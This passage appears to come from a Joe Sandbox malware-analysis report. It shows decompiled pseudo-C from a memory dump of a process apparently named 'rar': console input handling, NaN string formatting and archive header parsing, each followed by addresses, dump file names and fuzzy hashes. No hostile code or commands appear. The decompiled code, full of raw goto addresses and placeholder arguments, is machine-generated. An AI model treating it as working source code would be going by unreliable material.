				goto 0x50b5ac8e;
				if (5 - 1 < 0) goto 0x50b5ac8c;
				asm("cpuid");
				asm("bt ecx, 0x13");
				if (5 - 1 >= 0) goto 0x50b5ac68;
				goto 0x50b5ac8e;
				asm("bt ecx, 0x9");
				if (5 - 1 >= 0) goto 0x50b5ac75;
				goto 0x50b5ac8e;
				asm("bt edx, 0x1a");
				if (5 - 1 >= 0) goto 0x50b5ac82;
				goto 0x50b5ac8e;
				goto 0x50b5ac8e;
				return 0;
			}



                                                                                                            0x7ff650b5ac2d
                                                                                                            0x7ff650b5ac2f
                                                                                                            0x7ff650b5ac36
                                                                                                            0x7ff650b5ac3f
                                                                                                            0x7ff650b5ac44
                                                                                                            0x7ff650b5ac4b
                                                                                                            0x7ff650b5ac50
                                                                                                            0x7ff650b5ac59
                                                                                                            0x7ff650b5ac5b
                                                                                                            0x7ff650b5ac5f
                                                                                                            0x7ff650b5ac66
                                                                                                            0x7ff650b5ac68
                                                                                                            0x7ff650b5ac6c
                                                                                                            0x7ff650b5ac73
                                                                                                            0x7ff650b5ac75
                                                                                                            0x7ff650b5ac79
                                                                                                            0x7ff650b5ac80
                                                                                                            0x7ff650b5ac8a
                                                                                                            0x7ff650b5ac93

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b852b22c1b59c2d7a412188f14ac0f783d2404b1d28454a4c033f20608ff1150
                                                                                                            • Instruction ID: d5d55b822be96845767bcb299eac2d72a07d3d6ad7edc03465ead681447bf09c
                                                                                                            • Opcode Fuzzy Hash: b852b22c1b59c2d7a412188f14ac0f783d2404b1d28454a4c033f20608ff1150
                                                                                                            • Instruction Fuzzy Hash: 04F0A4A9A5C00773FBA8101CD89933981C5EB17300FA844BAE55FF67D1EC5EE9815149
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6ACA8 Relevance: .0, Instructions: 2COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 03de63e03c7dce61e49775f079ba9d0300a675b2f71d37b802154d54b27bb8b4
                                                                                                            • Instruction ID: 135b9f64ef96d61610273c0b75afa3311f3f2de14d36f7eff84700f02b4c3904
                                                                                                            • Opcode Fuzzy Hash: 03de63e03c7dce61e49775f079ba9d0300a675b2f71d37b802154d54b27bb8b4
                                                                                                            • Instruction Fuzzy Hash: B3A001A1918943E2EA848B00A8A00202620FB56344B580031E00FA12A49E2EE4009605
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B76160 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B76160(void* __edx, char* __r8, void* __r9) {
				void* _t7;
				signed long long _t11;
				signed long long _t12;
				void* _t17;

				_t16 = _t17 - 0x4f;
				_t18 = _t17 - 0xc0;
				_t11 =  *0x50b978f0; // 0x27db226282f1
				_t12 = _t11 ^ _t17 - 0x000000c0;
				 *(_t17 - 0x4f + 0x3f) = _t12;
				if (__r9 - _t12 + 4 >= 0) goto 0x50b761ac;
				 *__r8 = 0;
				return E00007FF67FF650B69D10(0xc, _t7,  *(_t16 + 0x3f) ^ _t18);
			}







                                                                                                            0x7ff650b76162
                                                                                                            0x7ff650b76167
                                                                                                            0x7ff650b7616e
                                                                                                            0x7ff650b76175
                                                                                                            0x7ff650b76178
                                                                                                            0x7ff650b7618c
                                                                                                            0x7ff650b7618e
                                                                                                            0x7ff650b761ab

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                            • API String ID: 3215553584-2617248754
                                                                                                            • Opcode ID: 4ad9c99e68d9796766f97548cad53acb64d5a0ece8208db33e0e169432c6dbfe
                                                                                                            • Instruction ID: 92e301d441b3a5959f587d9b3dea063d4cc01f7453bba4abe309dc147b6899ba
                                                                                                            • Opcode Fuzzy Hash: 4ad9c99e68d9796766f97548cad53acb64d5a0ece8208db33e0e169432c6dbfe
                                                                                                            • Instruction Fuzzy Hash: 3041AE32A09B46A9EB00CF25E88179933A4EB06398F084136EE5DA7B65DF3ED025C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B278D8 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E00007FF67FF650B278D8(void* __edx, signed long long __rax, void* __rcx, intOrPtr _a16, void* _a24, intOrPtr _a32) {
				long long _v56;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				int _t27;
				void* _t38;
				void* _t39;
				void* _t43;
				void* _t44;
				signed long long _t46;
				void* _t47;
				void* _t62;
				long _t67;
				long _t70;
				void* _t71;
				void* _t73;
				void* _t78;
				void* _t79;
				long long _t81;

				_t46 = __rax;
				if (__edx == 0) goto 0x50b279e6;
				r14d = 0;
				_t39 = __edx;
				_t43 =  *0x50b9996c - r14b; // 0x0
				_t71 = __rcx;
				if (_t43 == 0) goto 0x50b2791d;
				E00007FF67FF650B54598(0xec8, _t38, _t47, __rcx, _t73, _t78);
				E00007FF67FF650B283F0(_t46, _t62, _t78, _t79, _t81);
				_t1 = _t81 + 2; // 0x2
				E00007FF67FF650B2C930(_t1, _t43, _t47, 0x50ba7ab8, _t62, _t78, _t79);
				_t44 =  *0x50b9996f - r14b; // 0x0
				if (_t44 == 0) goto 0x50b27938;
				E00007FF67FF650B28260(_t46, _t47, _t71, _t73, _t71);
				goto 0x50b279cf;
				GetStdHandle(_t67);
				GetStdHandle(_t70);
				_a16 = r14d;
				GetConsoleMode(_t73);
				GetConsoleMode(_t47);
				SetConsoleMode(??, ??);
				SetConsoleMode(??, ??);
				_v56 = _t81;
				r8d = _t39;
				ReadConsoleW(??, ??, ??, ??, ??);
				 *((intOrPtr*)(_t71 + _t46 * 2)) = r14w;
				SetConsoleMode(??, ??);
				_t27 = SetConsoleMode(??, ??);
				 *((intOrPtr*)(_t71 + _t73 * 2)) = r14w;
				return E00007FF67FF650B5A128(_t27, _a32, _t71, _t71);
			}






















                                                                                                            0x7ff650b278d8
                                                                                                            0x7ff650b278da
                                                                                                            0x7ff650b278ea
                                                                                                            0x7ff650b278ed
                                                                                                            0x7ff650b278ef
                                                                                                            0x7ff650b278f6
                                                                                                            0x7ff650b278f9
                                                                                                            0x7ff650b27900
                                                                                                            0x7ff650b27908
                                                                                                            0x7ff650b2790d
                                                                                                            0x7ff650b27918
                                                                                                            0x7ff650b2791d
                                                                                                            0x7ff650b27924
                                                                                                            0x7ff650b2792c
                                                                                                            0x7ff650b27933
                                                                                                            0x7ff650b2793d
                                                                                                            0x7ff650b2794b
                                                                                                            0x7ff650b27956
                                                                                                            0x7ff650b27961
                                                                                                            0x7ff650b2796f
                                                                                                            0x7ff650b2797d
                                                                                                            0x7ff650b2798b
                                                                                                            0x7ff650b27993
                                                                                                            0x7ff650b27998
                                                                                                            0x7ff650b279a6
                                                                                                            0x7ff650b279b3
                                                                                                            0x7ff650b279bc
                                                                                                            0x7ff650b279c9
                                                                                                            0x7ff650b279d2
                                                                                                            0x7ff650b279e6

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Mode$HandleLoadString$Readfflush
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029067763-0
                                                                                                            • Opcode ID: 7e3993cba1616262b2241484019f5e2238552149f5495e1ad7625e9745dc338e
                                                                                                            • Instruction ID: b136c503ab5e9608673da6236c56fd73dead5a9a8460c3462ab472bece11e7d4
                                                                                                            • Opcode Fuzzy Hash: 7e3993cba1616262b2241484019f5e2238552149f5495e1ad7625e9745dc338e
                                                                                                            • Instruction Fuzzy Hash: 7821A025A1D747A3FA409B25E8940397751AF8BBD1F580130EE4BA37B5DE3EE446CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1C37C Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 415COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00007FF67FF650B1C37C(signed int __ebx, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				char _t77;
				signed char _t84;
				void* _t99;
				signed char _t102;
				void* _t115;
				signed char _t121;
				long long _t137;
				void* _t138;
				void* _t145;
				void* _t159;
				signed char _t160;
				signed char _t161;
				signed long long _t166;
				long long _t169;
				void* _t172;
				void* _t182;
				intOrPtr* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t195;
				long long _t225;
				intOrPtr _t229;
				void* _t245;
				void* _t248;
				void* _t251;
				void* _t253;
				signed long long _t254;
				void* _t263;
				void* _t264;
				void* _t272;
				long long _t275;
				void* _t276;
				void* _t279;
				long long _t280;

				_t262 = __r9;
				 *((long long*)(_t253 + 0x18)) = __rbx;
				_t251 = _t253 - 0x1ff0;
				E00007FF67FF650B69CB0(0x20f0, __rax, _t263, _t264);
				_t254 = _t253 - __rax;
				_t166 =  *0x50b978f0; // 0x27db226282f1
				 *(_t251 + 0x1fe0) = _t166 ^ _t254;
				_t248 = __r9;
				_t169 =  *((intOrPtr*)(__rdx + 0x30)) - __r8;
				 *((long long*)(_t254 + 0x28)) = __rcx;
				_t245 = __rdx;
				if (_t169 -  *((intOrPtr*)(__rdx + 0x38)) < 0) goto 0x50b1c7b3;
				 *((long long*)(__rdx + 0x38)) = _t169;
				if (__r8 - 2 < 0) goto 0x50b1c7b3;
				E00007FF67FF650B48BF8(__rdx, __r9);
				_t137 = _t169;
				if (_t137 <= 0) goto 0x50b1c7b3;
				_t229 =  *((intOrPtr*)(_t245 + 0x38));
				if (_t137 == 0) goto 0x50b1c7b3;
				_t138 = _t169 -  *((intOrPtr*)(_t245 + 0x30)) - _t229;
				if (_t138 > 0) goto 0x50b1c7b3;
				_t280 = _t229 + _t169;
				 *((long long*)(_t254 + 0x30)) = _t280;
				_t77 = E00007FF67FF650B48BF8(_t245, __r9);
				if (_t138 < 0) goto 0x50b1c7b3;
				if ( *((intOrPtr*)(__r9 + 4)) != 1) goto 0x50b1c48e;
				if (_t169 != 1) goto 0x50b1c48e;
				 *((char*)(__r9 + 0x1e)) = _t77;
				if ((__ebx & E00007FF67FF650B48BF8(_t245, __r9)) == 0) goto 0x50b1c464;
				E00007FF67FF650B48BF8(_t245, __r9);
				if (_t169 == 0) goto 0x50b1c464;
				 *((long long*)(__r9 + 0x20)) =  *((intOrPtr*)(__rcx + 0x7f68)) + _t169;
				if ((r15b & 0x00000002) == 0) goto 0x50b1c489;
				_t195 = _t245;
				E00007FF67FF650B48BF8(_t195, _t262);
				if (_t169 == 0) goto 0x50b1c48e;
				 *((long long*)(__r9 + 0x30)) = _t169 +  *((intOrPtr*)(__rcx + 0x7f68));
				goto 0x50b1c48e;
				_t26 = _t195 - 2; // -1
				_t145 = _t26 - 1;
				if (_t145 > 0) goto 0x50b1c799;
				if (_t145 == 0) goto 0x50b1c89e;
				if (_t145 == 0) goto 0x50b1c874;
				if (_t145 == 0) goto 0x50b1c6d2;
				if (_t145 == 0) goto 0x50b1c679;
				if (_t145 == 0) goto 0x50b1c602;
				_t182 = _t169 - 0xfffffffffffffffc;
				if (_t145 == 0) goto 0x50b1c528;
				if (_t182 != 1) goto 0x50b1c799;
				if ( *((intOrPtr*)(__r9 + 4)) != 3) goto 0x50b1c4f3;
				_t172 =  *((intOrPtr*)(_t245 + 0x30)) -  *((intOrPtr*)(_t254 + 0x30));
				if (_t172 != _t182) goto 0x50b1c4f3;
				_t275 = _t280 -  *((intOrPtr*)(_t245 + 0x38)) + 1;
				_t183 = __r9 + 0x1028;
				if (_t275 -  *((intOrPtr*)(_t183 + 0x10)) <= 0) goto 0x50b1c511;
				E00007FF67FF650B11754(_t183, _t183, _t275 -  *((intOrPtr*)(_t183 + 8)), __r9, _t279);
				goto 0x50b1c515;
				 *((long long*)(_t183 + 8)) = _t275;
				E00007FF67FF650B48B14(_t183, _t245,  *_t183, __r9, _t251, _t275);
				goto 0x50b1c799;
				_t84 = E00007FF67FF650B48BF8(_t245, _t262);
				_t276 = _t172;
				 *(__r9 + 0x211e) = _t84 >> 0x00000002 & 0x00000001;
				 *(__r9 + 0x211f) = _t84 >> 0x00000003 & 0x00000001;
				 *((char*)(__r9 + 0x2220)) = 0;
				 *((char*)(__r9 + 0x2120)) = 0;
				if ((_t84 & 0x00000001) == 0) goto 0x50b1c596;
				E00007FF67FF650B48BF8(_t245, _t262);
				_t184 =  <  ? _t172 : _t183;
				E00007FF67FF650B48B14(_t184, _t245, __r9 + 0x2120, __r9, _t251, _t184);
				 *((char*)(__r9 + _t184 + 0x2120)) = 0;
				if ((r14b & 0x00000002) == 0) goto 0x50b1c5c8;
				E00007FF67FF650B48BF8(_t245, _t262);
				_t185 =  <  ? _t172 : _t184;
				E00007FF67FF650B48B14(_t185, _t245, __r9 + 0x2220, __r9, _t251, _t185);
				 *((char*)(__r9 + _t185 + 0x2220)) = 0;
				if ( *(__r9 + 0x211e) == 0) goto 0x50b1c5df;
				 *((intOrPtr*)(__r9 + 0x2320)) = E00007FF67FF650B48BF8(_t245, _t262);
				if ( *(__r9 + 0x211f) == 0) goto 0x50b1c5f6;
				 *((intOrPtr*)(__r9 + 0x2324)) = E00007FF67FF650B48BF8(_t245, _t262);
				 *((char*)(__r9 + 0x211d)) = 1;
				goto 0x50b1c799;
				 *((intOrPtr*)(__r9 + 0x1118)) = E00007FF67FF650B48BF8(_t245, _t262);
				 *(__r9 + 0x211c) = E00007FF67FF650B48BF8(_t245, _t262) & 0x00000001;
				E00007FF67FF650B48BF8(_t245, _t262);
				 *((char*)(_t251 - 0x20)) = 0;
				_t186 = _t172;
				if (_t172 - 0x1fff >= 0) goto 0x50b1c64b;
				E00007FF67FF650B48B14(_t186, _t245, _t251 - 0x20, __r9, _t251, _t172);
				 *((char*)(_t251 + _t186 - 0x20)) = 0;
				r8d = 0x2000;
				E00007FF67FF650B45290(_t186, _t251 - 0x20, _t251 - 0x20, _t172, _t262);
				_t239 = __r9 + 0x111c;
				r8d = 0x800;
				E00007FF67FF650B5D1FC(_t186, _t251 - 0x20, __r9 + 0x111c, _t172);
				goto 0x50b1c799;
				if (_t276 - 1 < 0) goto 0x50b1c799;
				E00007FF67FF650B48BF8(_t245, _t262);
				_t99 = E00007FF67FF650B48BF8(_t245, _t262);
				if (_t99 == 0) goto 0x50b1c799;
				r9d = _t99;
				 *((char*)(_t248 + 0x1103)) = 1;
				E00007FF67FF650B1657C(0xff, _t172, _t251 - 0x50, _t239, L";%u", _t262, _t272);
				r8d = 0x800;
				E00007FF67FF650B5A368(_t172, _t248 + 0x28, L";%u");
				goto 0x50b1c799;
				_t159 = _t276 - 5;
				if (_t159 < 0) goto 0x50b1c799;
				_t102 = E00007FF67FF650B48BF8(_t245, _t262);
				_t121 = _t102 & 0x00000001;
				 *(_t254 + 0x20) = _t102 & 0x00000002;
				if (_t159 == 0) goto 0x50b1c724;
				_t160 = _t121;
				if (_t160 == 0) goto 0x50b1c710;
				E00007FF67FF650B5BCA0(E00007FF67FF650B48A9C(_t245), _t248 + 0x1050, _t251 - 0x50);
				goto 0x50b1c724;
				E00007FF67FF650B5BCB8(E00007FF67FF650B48AE4(_t160, _t172, _t186, _t248 + 0x1050), _t248 + 0x1050, _t172);
				r13b = r14b;
				r13b = r13b & 0x00000004;
				if (_t160 == 0) goto 0x50b1c75c;
				_t161 = _t121;
				if (_t161 == 0) goto 0x50b1c74c;
				E00007FF67FF650B5BCA0(E00007FF67FF650B48A9C(_t245), _t248 + 0x1058, _t172);
				goto 0x50b1c75c;
				E00007FF67FF650B5BCB8(E00007FF67FF650B48AE4(_t161, _t172, _t186, _t248 + 0x1058), _t248 + 0x1058, _t172);
				r12b = r14b;
				r12b = r12b & 0x00000008;
				if (_t161 == 0) goto 0x50b1c7dd;
				if (_t121 == 0) goto 0x50b1c784;
				E00007FF67FF650B5BCA0(E00007FF67FF650B48A9C(_t245), _t248 + 0x1060, _t172);
				goto 0x50b1c7e1;
				_t115 = E00007FF67FF650B5BCB8(E00007FF67FF650B48AE4(_t121, _t172, _t186, _t248 + 0x1060), _t248 + 0x1060, _t172);
				_t225 =  *((intOrPtr*)(_t254 + 0x30));
				 *((long long*)(_t245 + 0x38)) = _t225;
				if ( *((intOrPtr*)(_t245 + 0x30)) - _t225 - 2 >= 0) goto 0x50b1c3df;
				return E00007FF67FF650B69D10(_t115, 0xff,  *(_t251 + 0x1fe0) ^ _t254);
			}








































                                                                                                            0x7ff650b1c37c
                                                                                                            0x7ff650b1c37c
                                                                                                            0x7ff650b1c38c
                                                                                                            0x7ff650b1c399
                                                                                                            0x7ff650b1c39e
                                                                                                            0x7ff650b1c3a1
                                                                                                            0x7ff650b1c3ab
                                                                                                            0x7ff650b1c3b6
                                                                                                            0x7ff650b1c3b9
                                                                                                            0x7ff650b1c3bc
                                                                                                            0x7ff650b1c3c1
                                                                                                            0x7ff650b1c3cb
                                                                                                            0x7ff650b1c3d1
                                                                                                            0x7ff650b1c3d9
                                                                                                            0x7ff650b1c3e2
                                                                                                            0x7ff650b1c3e7
                                                                                                            0x7ff650b1c3ea
                                                                                                            0x7ff650b1c3f0
                                                                                                            0x7ff650b1c3fb
                                                                                                            0x7ff650b1c401
                                                                                                            0x7ff650b1c404
                                                                                                            0x7ff650b1c40a
                                                                                                            0x7ff650b1c411
                                                                                                            0x7ff650b1c416
                                                                                                            0x7ff650b1c425
                                                                                                            0x7ff650b1c42f
                                                                                                            0x7ff650b1c435
                                                                                                            0x7ff650b1c43a
                                                                                                            0x7ff650b1c447
                                                                                                            0x7ff650b1c44c
                                                                                                            0x7ff650b1c454
                                                                                                            0x7ff650b1c460
                                                                                                            0x7ff650b1c468
                                                                                                            0x7ff650b1c46a
                                                                                                            0x7ff650b1c46d
                                                                                                            0x7ff650b1c47a
                                                                                                            0x7ff650b1c483
                                                                                                            0x7ff650b1c487
                                                                                                            0x7ff650b1c491
                                                                                                            0x7ff650b1c494
                                                                                                            0x7ff650b1c497
                                                                                                            0x7ff650b1c4a1
                                                                                                            0x7ff650b1c4ab
                                                                                                            0x7ff650b1c4b5
                                                                                                            0x7ff650b1c4bf
                                                                                                            0x7ff650b1c4c9
                                                                                                            0x7ff650b1c4cf
                                                                                                            0x7ff650b1c4d3
                                                                                                            0x7ff650b1c4d9
                                                                                                            0x7ff650b1c4e2
                                                                                                            0x7ff650b1c4e8
                                                                                                            0x7ff650b1c4ee
                                                                                                            0x7ff650b1c4f0
                                                                                                            0x7ff650b1c4f3
                                                                                                            0x7ff650b1c4fe
                                                                                                            0x7ff650b1c50a
                                                                                                            0x7ff650b1c50f
                                                                                                            0x7ff650b1c511
                                                                                                            0x7ff650b1c51e
                                                                                                            0x7ff650b1c523
                                                                                                            0x7ff650b1c52b
                                                                                                            0x7ff650b1c546
                                                                                                            0x7ff650b1c549
                                                                                                            0x7ff650b1c557
                                                                                                            0x7ff650b1c55d
                                                                                                            0x7ff650b1c562
                                                                                                            0x7ff650b1c568
                                                                                                            0x7ff650b1c56d
                                                                                                            0x7ff650b1c582
                                                                                                            0x7ff650b1c589
                                                                                                            0x7ff650b1c58e
                                                                                                            0x7ff650b1c59a
                                                                                                            0x7ff650b1c59f
                                                                                                            0x7ff650b1c5b4
                                                                                                            0x7ff650b1c5bb
                                                                                                            0x7ff650b1c5c0
                                                                                                            0x7ff650b1c5cf
                                                                                                            0x7ff650b1c5d9
                                                                                                            0x7ff650b1c5e6
                                                                                                            0x7ff650b1c5f0
                                                                                                            0x7ff650b1c5f6
                                                                                                            0x7ff650b1c5fd
                                                                                                            0x7ff650b1c60d
                                                                                                            0x7ff650b1c61d
                                                                                                            0x7ff650b1c623
                                                                                                            0x7ff650b1c628
                                                                                                            0x7ff650b1c62c
                                                                                                            0x7ff650b1c635
                                                                                                            0x7ff650b1c641
                                                                                                            0x7ff650b1c646
                                                                                                            0x7ff650b1c64b
                                                                                                            0x7ff650b1c659
                                                                                                            0x7ff650b1c65e
                                                                                                            0x7ff650b1c665
                                                                                                            0x7ff650b1c66f
                                                                                                            0x7ff650b1c674
                                                                                                            0x7ff650b1c67d
                                                                                                            0x7ff650b1c686
                                                                                                            0x7ff650b1c68e
                                                                                                            0x7ff650b1c695
                                                                                                            0x7ff650b1c69b
                                                                                                            0x7ff650b1c69e
                                                                                                            0x7ff650b1c6b5
                                                                                                            0x7ff650b1c6be
                                                                                                            0x7ff650b1c6c8
                                                                                                            0x7ff650b1c6cd
                                                                                                            0x7ff650b1c6d2
                                                                                                            0x7ff650b1c6d6
                                                                                                            0x7ff650b1c6df
                                                                                                            0x7ff650b1c6e9
                                                                                                            0x7ff650b1c6ee
                                                                                                            0x7ff650b1c6f2
                                                                                                            0x7ff650b1c6f7
                                                                                                            0x7ff650b1c6f9
                                                                                                            0x7ff650b1c709
                                                                                                            0x7ff650b1c70e
                                                                                                            0x7ff650b1c71f
                                                                                                            0x7ff650b1c724
                                                                                                            0x7ff650b1c727
                                                                                                            0x7ff650b1c72b
                                                                                                            0x7ff650b1c737
                                                                                                            0x7ff650b1c739
                                                                                                            0x7ff650b1c745
                                                                                                            0x7ff650b1c74a
                                                                                                            0x7ff650b1c757
                                                                                                            0x7ff650b1c75c
                                                                                                            0x7ff650b1c75f
                                                                                                            0x7ff650b1c763
                                                                                                            0x7ff650b1c771
                                                                                                            0x7ff650b1c77d
                                                                                                            0x7ff650b1c782
                                                                                                            0x7ff650b1c78f
                                                                                                            0x7ff650b1c799
                                                                                                            0x7ff650b1c79e
                                                                                                            0x7ff650b1c7ad
                                                                                                            0x7ff650b1c7dc

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                            • API String ID: 233258989-2277559157
